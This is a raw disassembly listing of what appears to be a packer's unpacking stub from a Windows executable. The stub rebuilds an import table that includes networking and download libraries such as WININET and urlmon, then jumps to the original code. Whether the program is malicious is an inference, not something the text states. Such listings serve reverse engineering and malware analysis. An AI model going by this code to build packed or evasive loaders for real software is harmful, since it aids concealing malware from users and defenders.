mov esi, [esp]
inc esi
mov [esp+5Ch], esi
jz short loc_9C5DF9
loc_9C5DA0: ; CODE XREF: .text:009C5BB3�j
mov ecx, [esp+0Ch]
mov ebp, [esp+74h]
add ecx, 2
cmp [esp+5Ch], ebp
ja short loc_9C5E10
mov eax, [esp+0A0h]
mov edx, ebp
sub eax, [esp+5Ch]
add edx, [esp+0A0h]
lea esi, [eax+ebp]
loc_9C5DC8: ; CODE XREF: .text:009C5DE4�j
mov al, [esi]
inc esi
mov [esp+73h], al
mov [edx], al
inc edx
inc dword ptr [esp+74h]
dec ecx
jz short loc_9C5DE8
mov ebp, [esp+0A4h]
cmp [esp+74h], ebp
jb short loc_9C5DC8
jmp short loc_9C5DF9
; ---------------------------------------------------------------------------
loc_9C5DE8: ; CODE XREF: .text:009C56C8�j
; .text:009C56D9�j ...
mov eax, [esp+0A4h]
cmp [esp+74h], eax
jb loc_9C54B4
loc_9C5DF9: ; CODE XREF: .text:009C5D9E�j
; .text:009C5DE6�j
cmp dword ptr [esp+48h], 0FFFFFFh
ja short loc_9C5E18
cmp ebx, [esp+4Ch]
mov eax, 1
jz short loc_9C5E37
jmp short loc_9C5E17
; ---------------------------------------------------------------------------
loc_9C5E10: ; CODE XREF: .text:009C548E�j
; .text:009C54DE�j ...
mov eax, 1
jmp short loc_9C5E37
; ---------------------------------------------------------------------------
loc_9C5E17: ; CODE XREF: .text:009C5E0E�j
inc ebx
loc_9C5E18: ; CODE XREF: .text:009C54AE�j
; .text:009C5E01�j
sub ebx, [esp+94h]
xor eax, eax
mov edx, [esp+9Ch]
mov ecx, [esp+74h]
mov [edx], ebx
mov ebx, [esp+0A8h]
mov [ebx], ecx
loc_9C5E37: ; CODE XREF: .text:009C5E0C�j
; .text:009C5E15�j
add esp, 7Ch
pop ebx
pop esi
pop edi
pop ebp
add esi, [ebx-4]
add edi, [ebx-8]
xor eax, eax
lea ecx, [esp-100h]
mov esp, ebp
loc_9C5E4F: ; CODE XREF: .text:009C5E52�j
push eax
cmp esp, ecx
jnz short loc_9C5E4F
mov esp, ebp
xor ecx, ecx
pop esi
mov edi, esi
mov ecx, 16800h
jmp short loc_9C5E94
; ---------------------------------------------------------------------------
loc_9C5E62: ; CODE XREF: .text:009C5EA1�j
mov al, [edi]
add edi, 1
cmp al, 80h
jb short loc_9C5E75
cmp al, 8Fh
ja short loc_9C5E75
cmp byte ptr [edi-2], 0Fh
jz short loc_9C5E7B
loc_9C5E75: ; CODE XREF: .text:009C5E69�j
; .text:009C5E6D�j ...
sub al, 0E8h
cmp al, 1
ja short loc_9C5E9E
loc_9C5E7B: ; CODE XREF: .text:009C5E73�j
cmp byte ptr [edi], 1
jnz short loc_9C5E9E
mov eax, [edi]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
add eax, esi
mov [edi], eax
add edi, 4
loc_9C5E94: ; CODE XREF: .text:009C5E60�j
sub ecx, 4
mov al, [edi]
add edi, 1
loop loc_9C5E75
loc_9C5E9E: ; CODE XREF: .text:009C5E79�j
; .text:009C5E7E�j
sub ecx, 1
jg short loc_9C5E62
lea edi, [esi+22000h]
loc_9C5EA9: ; CODE XREF: .text:009C5ECB�j
mov eax, [edi]
or eax, eax
jz short loc_9C5EF4
mov ebx, [edi+4]
lea eax, [eax+esi+25000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+250F0h]
xchg eax, ebp
loc_9C5EC6: ; CODE XREF: .text:009C5EEC�j
mov al, [edi]
inc edi
or al, al
jz short loc_9C5EA9
mov ecx, edi
jns short near ptr loc_9C5ED7+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_9C5ED7: ; CODE XREF: .text:009C5ECF�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+250F4h]
or eax, eax
jz short loc_9C5EEE
mov [ebx], eax
add ebx, 4
jmp short loc_9C5EC6
; ---------------------------------------------------------------------------
loc_9C5EEE: ; CODE XREF: .text:009C5EE5�j
popa
xor eax, eax
retn 0Ch
; ---------------------------------------------------------------------------
loc_9C5EF4: ; CODE XREF: .text:009C5EAD�j
add edi, 4
lea ebx, [esi-4]
loc_9C5EFA: ; CODE XREF: .text:009C5F16�j
xor eax, eax
mov al, [edi]
inc edi
or eax, eax
jz short loc_9C5F25
cmp al, 0EFh
ja short loc_9C5F18
loc_9C5F07: ; CODE XREF: .text:009C5F23�j
add ebx, eax
mov eax, [ebx]
xchg al, ah
rol eax, 10h
xchg al, ah
add eax, esi
mov [ebx], eax
jmp short loc_9C5EFA
; ---------------------------------------------------------------------------
loc_9C5F18: ; CODE XREF: .text:009C5F05�j
and al, 0Fh
shl eax, 10h
mov ax, [edi]
add edi, 2
jmp short loc_9C5F07
; ---------------------------------------------------------------------------
loc_9C5F25: ; CODE XREF: .text:009C5F01�j
mov ebp, [esi+250F8h]
lea edi, [esi-1000h]
mov ebx, 1000h
push eax
push esp
push 4
push ebx
push edi
call ebp
lea eax, [edi+227h]
and byte ptr [eax], 7Fh
and byte ptr [eax+28h], 7Fh
pop eax
push eax
push esp
push eax
push ebx
push edi
call ebp
pop eax
popa
lea eax, [esp-80h]
loc_9C5F59: ; CODE XREF: .text:009C5F5D�j
push 0
cmp esp, eax
jnz short loc_9C5F59
sub esp, 0FFFFFF80h
loc_9C5F62: ; CODE XREF: .text:009C5375�j
jmp start
; ---------------------------------------------------------------------------
align 4
dd 29h dup(0)
dd 26158h, 260F0h, 3 dup(0)
dd 26165h, 26108h, 3 dup(0)
dd 26172h, 26110h, 3 dup(0)
dd 2617Dh, 26118h, 3 dup(0)
dd 26187h, 26120h, 3 dup(0)
dd 26194h, 26128h, 3 dup(0)
dd 261A0h, 26130h, 3 dup(0)
dd 261ACh, 26138h, 3 dup(0)
dd 261B7h, 26140h, 3 dup(0)
; ---------------------------------------------------------------------------
retn 261h
; ---------------------------------------------------------------------------
align 4
dd 26148h, 3 dup(0)
dd 261CEh, 26150h, 5 dup(0)
dd 7C801D77h, 7C80ADA0h, 7C801AD0h, 7C809A51h, 7C809AE4h
dd 0
dd 77DD7A80h, 0
dd 77C36BD0h, 0
dd 774FEF6Bh, 0
dd 77124920h, 0
dd 7CAB9576h, 0
dd 77F67E3Ch, 0
dd 78161DFDh, 0
dd 7E423DCEh, 0
dd 7806C865h, 0
dd 71AB2BC0h, 0
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h
dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 656C6F00h
dd 642E3233h, 4F006C6Ch, 5541454Ch, 2E323354h, 6C6C64h
dd 4C454853h, 2E32334Ch, 6C6C64h, 574C4853h, 2E495041h
dd 6C6C64h, 6D6C7275h, 642E6E6Fh, 55006C6Ch, 33524553h
dd 6C642E32h, 4957006Ch, 454E494Eh, 6C642E54h, 5357006Ch
dd 32335F32h, 6C6C642Eh, 6F4C0000h, 694C6461h, 72617262h
dd 4179h, 50746547h, 41636F72h, 65726464h, 7373h, 74726956h
dd 506C6175h, 65746F72h, 7463h, 74726956h, 416C6175h, 636F6C6Ch
dd 69560000h, 61757472h, 6572466Ch, 65h, 65657246h, 646953h
dd 62610000h, 73h, 6E496F43h, 61697469h, 657A696Ch, 7845h
dd 65474853h, 65705374h, 6C616963h, 646C6F46h, 61507265h
dd 416874h, 74530000h, 72745372h, 5749h, 6174624Fh, 73556E69h
dd 67417265h, 53746E65h, 6E697274h, 67h, 44746547h, 7449676Ch
dd 6D65h, 65746E49h, 74656E72h, 6E65704Fh, 41h, 25000h
dd 0Ch, 337Dh, 356h dup(0)
dd 4C010B31h
db 0
db 3 dup(?)
dd 3FEh dup(?)
_text ends
end start